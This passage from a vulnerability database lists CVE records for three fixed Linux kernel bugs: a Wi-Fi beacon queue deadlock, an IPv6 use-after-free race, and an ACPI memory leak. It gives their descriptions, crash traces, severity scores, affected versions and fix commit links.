"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.16",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.7.4",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.8",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nwifi: rt2x00: restart beacon queue when hardware reset\n\nWhen a hardware reset is triggered, all registers are reset, so all\nqueues are forced to stop in hardware interface. However, mac80211\nwill not automatically stop the queue. If we don\u0027t manually stop the\nbeacon queue, the queue will be deadlocked and unable to start again.\nThis patch fixes the issue where Apple devices cannot connect to the\nAP after calling ieee80211_restart_hw()."
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T07:39:26.412Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/e1f113b57ddd18274d7c83618deca25cc880bc48"
},
{
"url": "https://git.kernel.org/stable/c/69e905beca193125820c201ab3db4fb0e245124e"
},
{
"url": "https://git.kernel.org/stable/c/4cc198580a7b93a36f5beb923f40f7ae27a3716c"
},
{
"url": "https://git.kernel.org/stable/c/739b3ccd9486dff04af95f9a890846d088a84957"
},
{
"url": "https://git.kernel.org/stable/c/04cfe4a5da57ab9358cdfadea22bcb37324aaf83"
},
{
"url": "https://git.kernel.org/stable/c/fdb580ed05df8973aa5149cafa598c64bebcd0cb"
},
{
"url": "https://git.kernel.org/stable/c/a11d965a218f0cd95b13fe44d0bcd8a20ce134a8"
}
],
"title": "wifi: rt2x00: restart beacon queue when hardware reset",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2023-52595",
"datePublished": "2024-03-06T06:45:25.577Z",
"dateReserved": "2024-03-02T21:55:42.571Z",
"dateUpdated": "2025-05-04T07:39:26.412Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-35969 (GCVE-0-2024-35969)
Vulnerability from cvelistv5
Published
2024-05-20 09:41
Modified
2025-05-04 09:09
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
ipv6: fix race condition between ipv6_get_ifaddr and ipv6_del_addr
Although ipv6_get_ifaddr walks inet6_addr_lst under the RCU lock, it
still means hlist_for_each_entry_rcu can return an item that got removed
from the list. The memory itself of such item is not freed thanks to RCU
but nothing guarantees the actual content of the memory is sane.
In particular, the reference count can be zero. This can happen if
ipv6_del_addr is called in parallel. ipv6_del_addr removes the entry
from inet6_addr_lst (hlist_del_init_rcu(&ifp->addr_lst)) and drops all
references (__in6_ifa_put(ifp) + in6_ifa_put(ifp)). With bad enough
timing, this can happen:
1. In ipv6_get_ifaddr, hlist_for_each_entry_rcu returns an entry.
2. Then, the whole ipv6_del_addr is executed for the given entry. The
reference count drops to zero and kfree_rcu is scheduled.
3. ipv6_get_ifaddr continues and tries to increments the reference count
(in6_ifa_hold).
4. The rcu is unlocked and the entry is freed.
5. The freed entry is returned.
Prevent increasing of the reference count in such case. The name
in6_ifa_hold_safe is chosen to mimic the existing fib6_info_hold_safe.
[ 41.506330] refcount_t: addition on 0; use-after-free.
[ 41.506760] WARNING: CPU: 0 PID: 595 at lib/refcount.c:25 refcount_warn_saturate+0xa5/0x130
[ 41.507413] Modules linked in: veth bridge stp llc
[ 41.507821] CPU: 0 PID: 595 Comm: python3 Not tainted 6.9.0-rc2.main-00208-g49563be82afa #14
[ 41.508479] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996)
[ 41.509163] RIP: 0010:refcount_warn_saturate+0xa5/0x130
[ 41.509586] Code: ad ff 90 0f 0b 90 90 c3 cc cc cc cc 80 3d c0 30 ad 01 00 75 a0 c6 05 b7 30 ad 01 01 90 48 c7 c7 38 cc 7a 8c e8 cc 18 ad ff 90 <0f> 0b 90 90 c3 cc cc cc cc 80 3d 98 30 ad 01 00 0f 85 75 ff ff ff
[ 41.510956] RSP: 0018:ffffbda3c026baf0 EFLAGS: 00010282
[ 41.511368] RAX: 0000000000000000 RBX: ffff9e9c46914800 RCX: 0000000000000000
[ 41.511910] RDX: ffff9e9c7ec29c00 RSI: ffff9e9c7ec1c900 RDI: ffff9e9c7ec1c900
[ 41.512445] RBP: ffff9e9c43660c9c R08: 0000000000009ffb R09: 00000000ffffdfff
[ 41.512998] R10: 00000000ffffdfff R11: ffffffff8ca58a40 R12: ffff9e9c4339a000
[ 41.513534] R13: 0000000000000001 R14: ffff9e9c438a0000 R15: ffffbda3c026bb48
[ 41.514086] FS: 00007fbc4cda1740(0000) GS:ffff9e9c7ec00000(0000) knlGS:0000000000000000
[ 41.514726] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033
[ 41.515176] CR2: 000056233b337d88 CR3: 000000000376e006 CR4: 0000000000370ef0
[ 41.515713] DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000
[ 41.516252] DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400
[ 41.516799] Call Trace:
[ 41.517037] <TASK>
[ 41.517249] ? __warn+0x7b/0x120
[ 41.517535] ? refcount_warn_saturate+0xa5/0x130
[ 41.517923] ? report_bug+0x164/0x190
[ 41.518240] ? handle_bug+0x3d/0x70
[ 41.518541] ? exc_invalid_op+0x17/0x70
[ 41.520972] ? asm_exc_invalid_op+0x1a/0x20
[ 41.521325] ? refcount_warn_saturate+0xa5/0x130
[ 41.521708] ipv6_get_ifaddr+0xda/0xe0
[ 41.522035] inet6_rtm_getaddr+0x342/0x3f0
[ 41.522376] ? __pfx_inet6_rtm_getaddr+0x10/0x10
[ 41.522758] rtnetlink_rcv_msg+0x334/0x3d0
[ 41.523102] ? netlink_unicast+0x30f/0x390
[ 41.523445] ? __pfx_rtnetlink_rcv_msg+0x10/0x10
[ 41.523832] netlink_rcv_skb+0x53/0x100
[ 41.524157] netlink_unicast+0x23b/0x390
[ 41.524484] netlink_sendmsg+0x1f2/0x440
[ 41.524826] __sys_sendto+0x1d8/0x1f0
[ 41.525145] __x64_sys_sendto+0x1f/0x30
[ 41.525467] do_syscall_64+0xa5/0x1b0
[ 41.525794] entry_SYSCALL_64_after_hwframe+0x72/0x7a
[ 41.526213] RIP: 0033:0x7fbc4cfcea9a
[ 41.526528] Code: d8 64 89 02 48 c7 c0 ff ff ff ff eb b8 0f 1f 00 f3 0f 1e fa 41 89 ca 64 8b 04 25 18 00 00 00 85 c0 75 15 b8 2c 00 00 00 0f 05 <48> 3d 00 f0 ff ff 77 7e c3 0f 1f 44 00 00 41 54 48 83 ec 30 44 89
[ 41.527942] RSP: 002b:00007f
---truncated---
References
| URL | Tags | |||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: 5c578aedcb21d79eeb4e9cf04ca5b276ac82614c Version: 5c578aedcb21d79eeb4e9cf04ca5b276ac82614c Version: 5c578aedcb21d79eeb4e9cf04ca5b276ac82614c Version: 5c578aedcb21d79eeb4e9cf04ca5b276ac82614c Version: 5c578aedcb21d79eeb4e9cf04ca5b276ac82614c Version: 5c578aedcb21d79eeb4e9cf04ca5b276ac82614c Version: 5c578aedcb21d79eeb4e9cf04ca5b276ac82614c Version: 5c578aedcb21d79eeb4e9cf04ca5b276ac82614c |
||
{
"containers": {
"adp": [
{
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
}
},
{
"other": {
"content": {
"id": "CVE-2024-35969",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-06-18T14:46:35.940323Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-770",
"description": "CWE-770 Allocation of Resources Without Limits or Throttling",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2024-11-05T18:09:17.953Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
},
{
"providerMetadata": {
"dateUpdated": "2024-08-02T03:21:48.973Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/b4b3b69a19016d4e7fbdbd1dbcc184915eb862e1"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/cca606e14264098cba65efa82790825dbf69e903"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/3fb02ec57ead2891a2306af8c51a306bc5945e70"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/4b19e9507c275de0cfe61c24db69179dc52cf9fb"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/de76ae9ea1a6cf9e77fcec4f2df2904e26c23ceb"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/01b11a0566670612bd464a932e5ac2eae53d8652"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/6cdb20c342cd0193d3e956e3d83981d0f438bb83"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/7633c4da919ad51164acbf1aa322cc1a3ead6129"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00020.html"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"include/net/addrconf.h",
"net/ipv6/addrconf.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "b4b3b69a19016d4e7fbdbd1dbcc184915eb862e1",
"status": "affected",
"version": "5c578aedcb21d79eeb4e9cf04ca5b276ac82614c",
"versionType": "git"
},
{
"lessThan": "cca606e14264098cba65efa82790825dbf69e903",
"status": "affected",
"version": "5c578aedcb21d79eeb4e9cf04ca5b276ac82614c",
"versionType": "git"
},
{
"lessThan": "3fb02ec57ead2891a2306af8c51a306bc5945e70",
"status": "affected",
"version": "5c578aedcb21d79eeb4e9cf04ca5b276ac82614c",
"versionType": "git"
},
{
"lessThan": "4b19e9507c275de0cfe61c24db69179dc52cf9fb",
"status": "affected",
"version": "5c578aedcb21d79eeb4e9cf04ca5b276ac82614c",
"versionType": "git"
},
{
"lessThan": "de76ae9ea1a6cf9e77fcec4f2df2904e26c23ceb",
"status": "affected",
"version": "5c578aedcb21d79eeb4e9cf04ca5b276ac82614c",
"versionType": "git"
},
{
"lessThan": "01b11a0566670612bd464a932e5ac2eae53d8652",
"status": "affected",
"version": "5c578aedcb21d79eeb4e9cf04ca5b276ac82614c",
"versionType": "git"
},
{
"lessThan": "6cdb20c342cd0193d3e956e3d83981d0f438bb83",
"status": "affected",
"version": "5c578aedcb21d79eeb4e9cf04ca5b276ac82614c",
"versionType": "git"
},
{
"lessThan": "7633c4da919ad51164acbf1aa322cc1a3ead6129",
"status": "affected",
"version": "5c578aedcb21d79eeb4e9cf04ca5b276ac82614c",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"include/net/addrconf.h",
"net/ipv6/addrconf.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "2.6.35"
},
{
"lessThan": "2.6.35",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "4.19.*",
"status": "unaffected",
"version": "4.19.313",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.4.*",
"status": "unaffected",
"version": "5.4.275",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.216",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.156",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.87",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.28",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.8.*",
"status": "unaffected",
"version": "6.8.7",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.9",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "4.19.313",
"versionStartIncluding": "2.6.35",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.4.275",
"versionStartIncluding": "2.6.35",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.216",
"versionStartIncluding": "2.6.35",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.156",
"versionStartIncluding": "2.6.35",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.87",
"versionStartIncluding": "2.6.35",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.28",
"versionStartIncluding": "2.6.35",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.8.7",
"versionStartIncluding": "2.6.35",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.9",
"versionStartIncluding": "2.6.35",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nipv6: fix race condition between ipv6_get_ifaddr and ipv6_del_addr\n\nAlthough ipv6_get_ifaddr walks inet6_addr_lst under the RCU lock, it\nstill means hlist_for_each_entry_rcu can return an item that got removed\nfrom the list. The memory itself of such item is not freed thanks to RCU\nbut nothing guarantees the actual content of the memory is sane.\n\nIn particular, the reference count can be zero. This can happen if\nipv6_del_addr is called in parallel. ipv6_del_addr removes the entry\nfrom inet6_addr_lst (hlist_del_init_rcu(\u0026ifp-\u003eaddr_lst)) and drops all\nreferences (__in6_ifa_put(ifp) + in6_ifa_put(ifp)). With bad enough\ntiming, this can happen:\n\n1. In ipv6_get_ifaddr, hlist_for_each_entry_rcu returns an entry.\n\n2. Then, the whole ipv6_del_addr is executed for the given entry. The\n reference count drops to zero and kfree_rcu is scheduled.\n\n3. ipv6_get_ifaddr continues and tries to increments the reference count\n (in6_ifa_hold).\n\n4. The rcu is unlocked and the entry is freed.\n\n5. The freed entry is returned.\n\nPrevent increasing of the reference count in such case. The name\nin6_ifa_hold_safe is chosen to mimic the existing fib6_info_hold_safe.\n\n[ 41.506330] refcount_t: addition on 0; use-after-free.\n[ 41.506760] WARNING: CPU: 0 PID: 595 at lib/refcount.c:25 refcount_warn_saturate+0xa5/0x130\n[ 41.507413] Modules linked in: veth bridge stp llc\n[ 41.507821] CPU: 0 PID: 595 Comm: python3 Not tainted 6.9.0-rc2.main-00208-g49563be82afa #14\n[ 41.508479] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996)\n[ 41.509163] RIP: 0010:refcount_warn_saturate+0xa5/0x130\n[ 41.509586] Code: ad ff 90 0f 0b 90 90 c3 cc cc cc cc 80 3d c0 30 ad 01 00 75 a0 c6 05 b7 30 ad 01 01 90 48 c7 c7 38 cc 7a 8c e8 cc 18 ad ff 90 \u003c0f\u003e 0b 90 90 c3 cc cc cc cc 80 3d 98 30 ad 01 00 0f 85 75 ff ff ff\n[ 41.510956] RSP: 0018:ffffbda3c026baf0 EFLAGS: 00010282\n[ 41.511368] RAX: 0000000000000000 RBX: ffff9e9c46914800 RCX: 0000000000000000\n[ 41.511910] RDX: ffff9e9c7ec29c00 RSI: ffff9e9c7ec1c900 RDI: ffff9e9c7ec1c900\n[ 41.512445] RBP: ffff9e9c43660c9c R08: 0000000000009ffb R09: 00000000ffffdfff\n[ 41.512998] R10: 00000000ffffdfff R11: ffffffff8ca58a40 R12: ffff9e9c4339a000\n[ 41.513534] R13: 0000000000000001 R14: ffff9e9c438a0000 R15: ffffbda3c026bb48\n[ 41.514086] FS: 00007fbc4cda1740(0000) GS:ffff9e9c7ec00000(0000) knlGS:0000000000000000\n[ 41.514726] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033\n[ 41.515176] CR2: 000056233b337d88 CR3: 000000000376e006 CR4: 0000000000370ef0\n[ 41.515713] DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000\n[ 41.516252] DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400\n[ 41.516799] Call Trace:\n[ 41.517037] \u003cTASK\u003e\n[ 41.517249] ? __warn+0x7b/0x120\n[ 41.517535] ? refcount_warn_saturate+0xa5/0x130\n[ 41.517923] ? report_bug+0x164/0x190\n[ 41.518240] ? handle_bug+0x3d/0x70\n[ 41.518541] ? exc_invalid_op+0x17/0x70\n[ 41.520972] ? asm_exc_invalid_op+0x1a/0x20\n[ 41.521325] ? refcount_warn_saturate+0xa5/0x130\n[ 41.521708] ipv6_get_ifaddr+0xda/0xe0\n[ 41.522035] inet6_rtm_getaddr+0x342/0x3f0\n[ 41.522376] ? __pfx_inet6_rtm_getaddr+0x10/0x10\n[ 41.522758] rtnetlink_rcv_msg+0x334/0x3d0\n[ 41.523102] ? netlink_unicast+0x30f/0x390\n[ 41.523445] ? __pfx_rtnetlink_rcv_msg+0x10/0x10\n[ 41.523832] netlink_rcv_skb+0x53/0x100\n[ 41.524157] netlink_unicast+0x23b/0x390\n[ 41.524484] netlink_sendmsg+0x1f2/0x440\n[ 41.524826] __sys_sendto+0x1d8/0x1f0\n[ 41.525145] __x64_sys_sendto+0x1f/0x30\n[ 41.525467] do_syscall_64+0xa5/0x1b0\n[ 41.525794] entry_SYSCALL_64_after_hwframe+0x72/0x7a\n[ 41.526213] RIP: 0033:0x7fbc4cfcea9a\n[ 41.526528] Code: d8 64 89 02 48 c7 c0 ff ff ff ff eb b8 0f 1f 00 f3 0f 1e fa 41 89 ca 64 8b 04 25 18 00 00 00 85 c0 75 15 b8 2c 00 00 00 0f 05 \u003c48\u003e 3d 00 f0 ff ff 77 7e c3 0f 1f 44 00 00 41 54 48 83 ec 30 44 89\n[ 41.527942] RSP: 002b:00007f\n---truncated---"
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T09:09:27.884Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/b4b3b69a19016d4e7fbdbd1dbcc184915eb862e1"
},
{
"url": "https://git.kernel.org/stable/c/cca606e14264098cba65efa82790825dbf69e903"
},
{
"url": "https://git.kernel.org/stable/c/3fb02ec57ead2891a2306af8c51a306bc5945e70"
},
{
"url": "https://git.kernel.org/stable/c/4b19e9507c275de0cfe61c24db69179dc52cf9fb"
},
{
"url": "https://git.kernel.org/stable/c/de76ae9ea1a6cf9e77fcec4f2df2904e26c23ceb"
},
{
"url": "https://git.kernel.org/stable/c/01b11a0566670612bd464a932e5ac2eae53d8652"
},
{
"url": "https://git.kernel.org/stable/c/6cdb20c342cd0193d3e956e3d83981d0f438bb83"
},
{
"url": "https://git.kernel.org/stable/c/7633c4da919ad51164acbf1aa322cc1a3ead6129"
}
],
"title": "ipv6: fix race condition between ipv6_get_ifaddr and ipv6_del_addr",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-35969",
"datePublished": "2024-05-20T09:41:57.858Z",
"dateReserved": "2024-05-17T13:50:33.140Z",
"dateUpdated": "2025-05-04T09:09:27.884Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-26894 (GCVE-0-2024-26894)
Vulnerability from cvelistv5
Published
2024-04-17 10:27
Modified
2025-05-04 08:59
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
ACPI: processor_idle: Fix memory leak in acpi_processor_power_exit()
After unregistering the CPU idle device, the memory associated with
it is not freed, leading to a memory leak:
unreferenced object 0xffff896282f6c000 (size 1024):
comm "swapper/0", pid 1, jiffies 4294893170
hex dump (first 32 bytes):
00 00 00 00 0b 00 00 00 00 00 00 00 00 00 00 00 ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
backtrace (crc 8836a742):
[<ffffffff993495ed>] kmalloc_trace+0x29d/0x340
[<ffffffff9972f3b3>] acpi_processor_power_init+0xf3/0x1c0
[<ffffffff9972d263>] __acpi_processor_start+0xd3/0xf0
[<ffffffff9972d2bc>] acpi_processor_start+0x2c/0x50
[<ffffffff99805872>] really_probe+0xe2/0x480
[<ffffffff99805c98>] __driver_probe_device+0x78/0x160
[<ffffffff99805daf>] driver_probe_device+0x1f/0x90
[<ffffffff9980601e>] __driver_attach+0xce/0x1c0
[<ffffffff99803170>] bus_for_each_dev+0x70/0xc0
[<ffffffff99804822>] bus_add_driver+0x112/0x210
[<ffffffff99807245>] driver_register+0x55/0x100
[<ffffffff9aee4acb>] acpi_processor_driver_init+0x3b/0xc0
[<ffffffff990012d1>] do_one_initcall+0x41/0x300
[<ffffffff9ae7c4b0>] kernel_init_freeable+0x320/0x470
[<ffffffff99b231f6>] kernel_init+0x16/0x1b0
[<ffffffff99042e6d>] ret_from_fork+0x2d/0x50
Fix this by freeing the CPU idle device after unregistering it.
References
| URL | Tags | ||||||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
|||||||||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: 3d339dcbb56d8d70c1b959aff87d74adc3a84eea Version: 3d339dcbb56d8d70c1b959aff87d74adc3a84eea Version: 3d339dcbb56d8d70c1b959aff87d74adc3a84eea Version: 3d339dcbb56d8d70c1b959aff87d74adc3a84eea Version: 3d339dcbb56d8d70c1b959aff87d74adc3a84eea Version: 3d339dcbb56d8d70c1b959aff87d74adc3a84eea Version: 3d339dcbb56d8d70c1b959aff87d74adc3a84eea Version: 3d339dcbb56d8d70c1b959aff87d74adc3a84eea Version: 3d339dcbb56d8d70c1b959aff87d74adc3a84eea |
||
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-02T00:21:05.515Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/d351bcadab6caa6d8ce7159ff4b77e2da35c09fa"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/ea96bf3f80625cddba1391a87613356b1b45716d"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/c2a30c81bf3cb9033fa9f5305baf7c377075e2e5"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/1cbaf4c793b0808532f4e7b40bc4be7cec2c78f2"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/fad9bcd4d754cc689c19dc04d2c44b82c1a5d6c8"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/3d48e5be107429ff5d824e7f2a00d1b610d36fbc"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/8d14a4d0afb49a5b8535d414c782bb334860e73e"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/cd5c2d0b09d5b6d3f0a7bbabe6761a4997e9dee9"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/e18afcb7b2a12b635ac10081f943fcf84ddacc51"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00020.html"
}
],
"title": "CVE Program Container"
},
{
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 6,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "HIGH",
"integrityImpact": "NONE",
"privilegesRequired": "HIGH",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:H",
"version": "3.1"
}
},
{
"other": {
"content": {
"id": "CVE-2024-26894",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2025-02-06T16:56:24.973748Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-770",
"description": "CWE-770 Allocation of Resources Without Limits or Throttling",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2025-02-06T16:57:05.473Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"drivers/acpi/processor_idle.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "d351bcadab6caa6d8ce7159ff4b77e2da35c09fa",
"status": "affected",
"version": "3d339dcbb56d8d70c1b959aff87d74adc3a84eea",
"versionType": "git"
},
{
"lessThan": "ea96bf3f80625cddba1391a87613356b1b45716d",
"status": "affected",
"version": "3d339dcbb56d8d70c1b959aff87d74adc3a84eea",
"versionType": "git"
},
{
"lessThan": "c2a30c81bf3cb9033fa9f5305baf7c377075e2e5",
"status": "affected",
"version": "3d339dcbb56d8d70c1b959aff87d74adc3a84eea",
"versionType": "git"
},
{
"lessThan": "1cbaf4c793b0808532f4e7b40bc4be7cec2c78f2",
"status": "affected",
"version": "3d339dcbb56d8d70c1b959aff87d74adc3a84eea",
"versionType": "git"
},
{
"lessThan": "fad9bcd4d754cc689c19dc04d2c44b82c1a5d6c8",
"status": "affected",
"version": "3d339dcbb56d8d70c1b959aff87d74adc3a84eea",
"versionType": "git"
},
{
"lessThan": "3d48e5be107429ff5d824e7f2a00d1b610d36fbc",
"status": "affected",
"version": "3d339dcbb56d8d70c1b959aff87d74adc3a84eea",
"versionType": "git"
},
{
"lessThan": "8d14a4d0afb49a5b8535d414c782bb334860e73e",
"status": "affected",
"version": "3d339dcbb56d8d70c1b959aff87d74adc3a84eea",
"versionType": "git"
},
{
"lessThan": "cd5c2d0b09d5b6d3f0a7bbabe6761a4997e9dee9",
"status": "affected",
"version": "3d339dcbb56d8d70c1b959aff87d74adc3a84eea",
"versionType": "git"
},
{
"lessThan": "e18afcb7b2a12b635ac10081f943fcf84ddacc51",
"status": "affected",
"version": "3d339dcbb56d8d70c1b959aff87d74adc3a84eea",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"drivers/acpi/processor_idle.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "3.7"
},
{
"lessThan": "3.7",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "4.19.*",
"status": "unaffected",
"version": "4.19.311",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.4.*",
"status": "unaffected",
"version": "5.4.273",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.214",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.153",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.83",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.23",
